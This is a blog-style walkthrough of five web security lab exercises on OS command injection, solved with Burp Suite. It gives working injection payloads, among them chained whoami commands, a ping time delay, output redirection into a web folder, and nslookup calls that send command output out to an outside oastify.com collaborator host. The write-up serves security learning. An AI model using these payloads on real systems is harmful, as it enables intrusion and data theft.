root💀bl4ck4non-sec:~#

Hack. Eat. Sleep. Repeat!!!

View on GitHub

OS command injection, simple case

Task

image

Navigate to the website,

image image

Capture this request on burpsuite and send it over to burp repeater

image

So the vulnerability lies in the storeId function.

Checking payload all things I saw something on chaining commands, we can execute the whoami command by chaining it. So, we’ll have something like this

storeId=1|whoami

Trying this

image

So we got the name of the current user.

Checking the response in our browser

image

We have successfully completed the task

Blind OS command injection with time delays

Task

image

Navigate to the webpage,

image image

Lets capture this request and send it over to burp intruder

image

We were told the vulnerability is in the feedback function. We’ll be injecting the email section. we can use this payload to cause a 10 second delay

||ping -c 10 127.0.0.1||

Applying that payload and ensuring it is url encoded

image

Checking the response in our browser

image

We have successfully completed the task for this lab.

Blind OS command injection with output redirection

Task

image

Navigate to the webpage,

image image

Capturing this request on burpsuite and sending it over to burp repeater

image

Now, we were given the writable folder to be /var/www/images and we are to execute the whoami command and then retrieve the output. So to write to that folder we can use the payload

||whoami > /var/www/images/abeg.txt||

Ensure this is url encoded

image

Lets try to view an image, we’ll be capturing this request on burpsuite and sending it over to burp repeater

image

Now the file we wrote the whoami command to earlier was abeg.txt, so we’ll be changing the name of the image to abeg.txt

image

Cool, the command got executed successfully.

Checking our browser

image

We have successfully solved this lab.

Blind OS command injection with out-of-band interaction

Task

image

Navigate to the webpage,

image image

Capture this request on burpsuite and send it over to burp repeater

image

so, to solve this lab we have to issue a DNS lookup to burp collaborator

image

Click on “copy to clipboard” to copy the payload to use. So we can use nslookup with the payload burp collaborator client generated for us

||nslookup 2ad7n17mkusj9u18hveevnj8zz5pte.oastify.com||

Ensure it is url encoded

image

Checking the burp collaborator client window

image

We have successfully sent a DNS query

Checking the webpage again,

image

We have successfully solved the task

Blind OS command injection with out-of-band data exfiltration

Task

image

Navigate to the website,

image image

Capture this request on burpsuite and send it over to burp repeater

We have execute the whoami command and exfiltrate the output via a DNS query to Burp Collaborator.

image

Click on “copy to clipboard” to copy the payload to use. So we can use nslookup with the payload burp collaborator client generated for us to run the whoami command.

We can use the payload

||nslookup `whoami`.8clpqlx6r4oe0u0r87hwrnkonft5hu.oastify.com||

Ensure this is url encoded

image

We got the name of the current user to be peter-WmKLbv.

Submitting this name

image image

We have successfully completed this lab😎

Till Next Time :xD



Back To Home